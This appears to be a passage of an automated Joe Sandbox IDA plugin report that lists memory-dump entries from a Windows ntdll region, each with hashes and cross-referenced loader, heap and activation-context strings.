                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: a1e4aee68d906eee3fa52e3219ab67bb8f663c181d51ce571bf6060ddbbc0977
                                  • Instruction ID: f3670fb8697bbede811423b5c715f9b8751151fcc89fb9758736a9e54d73987c
                                  • Opcode Fuzzy Hash: a1e4aee68d906eee3fa52e3219ab67bb8f663c181d51ce571bf6060ddbbc0977
                                  • Instruction Fuzzy Hash: C9C1AF74508386CFE729CF58C084B6AB7E4FF84708F444869F995CBA91E734CA49CB56
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 018D8421
                                  • LdrpInitializeProcess, xrefs: 018D8422
                                  • @, xrefs: 018D8591
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 018D855E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: f35ce1d2f6138e0b67194ab326da28bb20f4063bec9854279ad37294886b3c4c
                                  • Instruction ID: dc01b8c38e1bdb43818637b8a805b71822d9e64063544113117f1c5ad87be464
                                  • Opcode Fuzzy Hash: f35ce1d2f6138e0b67194ab326da28bb20f4063bec9854279ad37294886b3c4c
                                  • Instruction Fuzzy Hash: 39918E71508349AFE722DF69CC84EABBBECBB85744F40092EF684D2151E774DA44CB62
                                  Strings
                                  • .Local, xrefs: 018D28D8
                                  • SXS: %s() passed the empty activation context, xrefs: 019121DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019122B6
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019121D9, 019122B1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: 8c05de59116a67994b7087bb07b506909f7ca9900040d3e146ef4e2e2c0c9490
                                  • Instruction ID: dade093586082829c0b8264e570a2db65bb82620248411cddf18ac76ca1fccd9
                                  • Opcode Fuzzy Hash: 8c05de59116a67994b7087bb07b506909f7ca9900040d3e146ef4e2e2c0c9490
                                  • Instruction Fuzzy Hash: 15A19B3190132DABDB25DF68C888BA9B7B6BF58314F2545E9D908E7255D7309F80CF90
                                  Strings
                                  • RtlDeactivateActivationContext, xrefs: 01913425, 01913432, 01913451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0191342A
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01913437
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01913456
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: 147bb74a2c27329abd4609e03236ac2d2450bd1089f41e1cd1bd88753b3fc33c
                                  • Instruction ID: a37d39cfff54565e9a9e5729cb0dcb7e37cb6eb67e9141bd12f5af02914797f8
                                  • Opcode Fuzzy Hash: 147bb74a2c27329abd4609e03236ac2d2450bd1089f41e1cd1bd88753b3fc33c
                                  • Instruction Fuzzy Hash: 716124326807169BD722CF1DC881B2AB7F5FF90B20F14852DE959DB684DB34EA41CB91
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01901028
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01900FE5
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019010AE
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0190106B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: 73b9deb04d428ce508d1ebfb4f3f97b9de838f6b1692022704bf6419c88cf70a
                                  • Instruction ID: 6765986e60502fdfd35d898ebf8dc02cb1469dde3d40ea456684bcfd1427d82b
                                  • Opcode Fuzzy Hash: 73b9deb04d428ce508d1ebfb4f3f97b9de838f6b1692022704bf6419c88cf70a
                                  • Instruction Fuzzy Hash: 4C71E4B19043059FDB21DF18C884B977FA8EF95754F580468F988CB28AE374D688CBD2
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0190A9A2
                                  • apphelp.dll, xrefs: 018C2462
                                  • LdrpDynamicShimModule, xrefs: 0190A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0190A992
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 7a7be5ba7d598aec93510ea7408a45669673113ba56170de583eb9a4b33e29df
                                  • Instruction ID: fea34aded3dc054304dc9d67ba5ddfb0a3cb2a299ce246aba42641e8b53bc19e
                                  • Opcode Fuzzy Hash: 7a7be5ba7d598aec93510ea7408a45669673113ba56170de583eb9a4b33e29df
                                  • Instruction Fuzzy Hash: D1311671600301AFDB329F6E9985AAAB7BAFB84B04F15001DE915AB295D7709A82C7C1
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 018B3255
                                  • HEAP: , xrefs: 018B3264
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 018B327D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: c182d90503ddb526965b4192b14cf6be2c31b07de05fedbb004c4cbc1eccb6c2
                                  • Instruction ID: 2dfcd1b6aa9884f62059e0911041606a790f74ffcd958683cda4e60590c18718
                                  • Opcode Fuzzy Hash: c182d90503ddb526965b4192b14cf6be2c31b07de05fedbb004c4cbc1eccb6c2
                                  • Instruction Fuzzy Hash: AD92AB71A046499FDB25CF68C484BEEBBF2FF49304F188069E859EB352D734AA45CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: b93bbfaa91de3bd1843d033862363ea4c74ec2e3b199da52763456bf63995c9c
                                  • Instruction ID: 78586f90bb78ff0ad94d4c79a3e418eed1514cf371bd00f725f9bff4a5894c75
                                  • Opcode Fuzzy Hash: b93bbfaa91de3bd1843d033862363ea4c74ec2e3b199da52763456bf63995c9c
                                  • Instruction Fuzzy Hash: CEF19C70600606DFEB26CF68C894BAABBB5FF44704F148168E51ADB391D734EA81CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  • Opcode ID: 8a02b5c790d61554cbfa23512efd50b0c202bc9792b2d8d8a4ea34e6a0e9e600
                                  • Instruction ID: 66ad1636d0972d21b81ce5bd7115af4dd0c1dd7f06dd537218068f184b7f5aac
                                  • Opcode Fuzzy Hash: 8a02b5c790d61554cbfa23512efd50b0c202bc9792b2d8d8a4ea34e6a0e9e600
                                  • Instruction Fuzzy Hash: D5C27F716083459FE726CF28C881BABBBE5AF88B14F04896DF989C7241D734DA45CF52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: a0e1e78c0bec3613669d2eba18e3c1aa09ee3922c43c6c1b379540237180822d
                                  • Instruction ID: acf31714e33dafd151f89c5de2e6433cde615344ce46f822c8d6cf3fb11479e5
                                  • Opcode Fuzzy Hash: a0e1e78c0bec3613669d2eba18e3c1aa09ee3922c43c6c1b379540237180822d
                                  • Instruction Fuzzy Hash: 5AA157719116299BDF319B68CC88BAAB7B8EF44704F1001EAEA09E7251E7359F84CF51
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0190A121
                                  • Failed to allocated memory for shimmed module list, xrefs: 0190A10F
                                  • LdrpCheckModule, xrefs: 0190A117
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  • Opcode ID: f7f40234f7d3820b061031d2457cf17cd031b177d89813fd531a18433c359f9a
                                  • Instruction ID: e24cf2c78e83c0766bf8e9dc308ca7b3c27694ff39a9a97410ac6da757954902
                                  • Opcode Fuzzy Hash: f7f40234f7d3820b061031d2457cf17cd031b177d89813fd531a18433c359f9a
                                  • Instruction Fuzzy Hash: 0571BD75A00309DFDB26DF6CC981AAEB7F4FB48B44F14406DE906EB251E634EA41CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: fe2d8e738aaa067b96fe2f017126e274d5a5d05d1011d62615a6983df5c716f5
                                  • Instruction ID: 60f5e6b557297fffbbe42a48abfa8d0240d33eb5ff16091eabfd494672fb1f19
                                  • Opcode Fuzzy Hash: fe2d8e738aaa067b96fe2f017126e274d5a5d05d1011d62615a6983df5c716f5
                                  • Instruction Fuzzy Hash: A7617971600305DFEB29CF28C480BAABBB5FF45704F158559E499CB396D770E981CB91
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 019182E8
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 019182DE
                                  • Failed to reallocate the system dirs string !, xrefs: 019182D7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: c0f9bb4282ec95b0ee44812124b9cafcecf5cb12996388f0718f7da586e87683
                                  • Instruction ID: 5eab72d5a2f4bbad266acc6993d142524cbbb6cd1766842e105554a602dfb793
                                  • Opcode Fuzzy Hash: c0f9bb4282ec95b0ee44812124b9cafcecf5cb12996388f0718f7da586e87683
                                  • Instruction Fuzzy Hash: 3E410471505305ABDB21EB6DD884B5B77E8AF48750F01482EF948D3254E774DA00CB92
                                  Strings
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0195C1C5
                                  • PreferredUILanguages, xrefs: 0195C212
                                  • @, xrefs: 0195C1F1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: cdd81b202773c0541de7707ab102484f07a3558c3b05de93a62251d0fa12ef48
                                  • Instruction ID: c71678d878d4f97ecd0e93d32c26c4ee801c1dec55e5fab745418069fde68e05
                                  • Opcode Fuzzy Hash: cdd81b202773c0541de7707ab102484f07a3558c3b05de93a62251d0fa12ef48
                                  • Instruction Fuzzy Hash: 43417171E00309EBDF51DAD8C891FEEBBBCAB14745F04416AEA09F7240D774DA448B91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: ddd8321d192891a50beea8390fac47403806f015fdefe6feebdeebd6f5b5a5cc
                                  • Instruction ID: 18d88def2e0b98f458229ab2ac4cee553ab347ae4b3b5eb101da34bc9309c01a
                                  • Opcode Fuzzy Hash: ddd8321d192891a50beea8390fac47403806f015fdefe6feebdeebd6f5b5a5cc
                                  • Instruction Fuzzy Hash: 1341F331A00659CBEB25DBD8C884BADBBB9FFA5340F16045AD909FB791D7348A01CB51
                                  Strings
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01924888
                                  • LdrpCheckRedirection, xrefs: 0192488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01924899
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: 50e5a8eee7bea1b7755dc7807e223f2fae2ed6d21620e52ee22183e7061959a0
                                  • Instruction ID: 2d2f0bd2d6bd5020ec69d7e3cb7e75151c280b58baf071f1a74d3ec25495a35e
                                  • Opcode Fuzzy Hash: 50e5a8eee7bea1b7755dc7807e223f2fae2ed6d21620e52ee22183e7061959a0
                                  • Instruction Fuzzy Hash: 65419E32A147719BCB21DE6CD840A26BBE8BF89B51B060569ED5DDB319D770E800CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 02ef6d193a498ae02e742002a98336194426fc7cc70b4ff0b4feca240c11c314
                                  • Instruction ID: 1fc09cc20bed0bb60f673f3dee25a6d390efe069fd6c9854e62a922eca2d498c
                                  • Opcode Fuzzy Hash: 02ef6d193a498ae02e742002a98336194426fc7cc70b4ff0b4feca240c11c314
                                  • Instruction Fuzzy Hash: 1911DF313241069FEB2ACB18C4C4FBAB3A9EF40B1AF1A8159F40ACB391DB34D941CB51
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01922104
                                  • LdrpInitializationFailure, xrefs: 019220FA
                                  • Process initialization failed with status 0x%08lx, xrefs: 019220F3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: d361e852e0f7d0f92592e8e6dd7684bbcde25024c5e523cc18186fd9cfefe9ec
                                  • Instruction ID: 75030175b4acc8d158330a2d7623fce747cc098f894bae742c645c20dad02150
                                  • Opcode Fuzzy Hash: d361e852e0f7d0f92592e8e6dd7684bbcde25024c5e523cc18186fd9cfefe9ec
                                  • Instruction Fuzzy Hash: 0EF0C8756403186BEB24EB5CCC46F99376DFB41B54F200059F604A738AD6B4AA40C651
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: e9d21ff851c3e1790eaed20998b7c005fe371aa0f735f3691f29157a0368cd28
                                  • Instruction ID: c1dbdd94cb578ce48c7ce999e893dad8bd2f292fc3ff0f776d62b1074e7ef8a1
                                  • Opcode Fuzzy Hash: e9d21ff851c3e1790eaed20998b7c005fe371aa0f735f3691f29157a0368cd28
                                  • Instruction Fuzzy Hash: 50712C71A0014A9FDB01DF98C994BEEBBF8BF58704F144065EA05E7251EA38EE41CB61
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 018AAA25
                                  • LdrResSearchResource Enter, xrefs: 018AAA13
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018A063D
                                  • kLsE, xrefs: 018A0540
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  Strings
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 018AA309
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 018AA2FB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0192895E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc00d90e7f59e8ba9dab4d69b02f1b170ac876ab47e27b847602a6be9313c083
                                  • Instruction ID: 37fd679485623999fe14729bf539d5b88517565ef63e936cc5b4bedbbfd332c3
                                  • Opcode Fuzzy Hash: bc00d90e7f59e8ba9dab4d69b02f1b170ac876ab47e27b847602a6be9313c083
                                  • Instruction Fuzzy Hash: 05A1AE72A14612DFD712DF18C980BAABBE9FF48704F450928F589DB652D334ED41CB92
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                  • Instruction ID: 801074f73a7a19a7d10b8a69f65a94366f83db7c71e8c1d38440e065d2336661
                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                  • Instruction Fuzzy Hash: 6BB13B71E1065ADFDF15CFADC880AADBBB9FF48310F148569E918AB354D730A941CB90
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f393123b90a8e8d2c5593dbd6cc6a20abc3ffa6770888b36ad9608c7a437513
                                  • Instruction ID: 8b11ca912ed5d66677eeac3b0b71ba51a8039c879e9dcebcfa5d4b33cb37dd29
                                  • Opcode Fuzzy Hash: 8f393123b90a8e8d2c5593dbd6cc6a20abc3ffa6770888b36ad9608c7a437513
                                  • Instruction Fuzzy Hash: 5691A571D0022AAFDB15CF68D884BAEBFB9EF49710F154159EA14EB745D734EE008BA0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8c801fb50db7cd56d9afd8d4f93cbbbca4adf3c1119a38c77d1939be34761e9
                                  • Instruction ID: c2533a12fcc17072b9a240534998f5406e851efd9aac5ecaeee2fd69dbf354d3
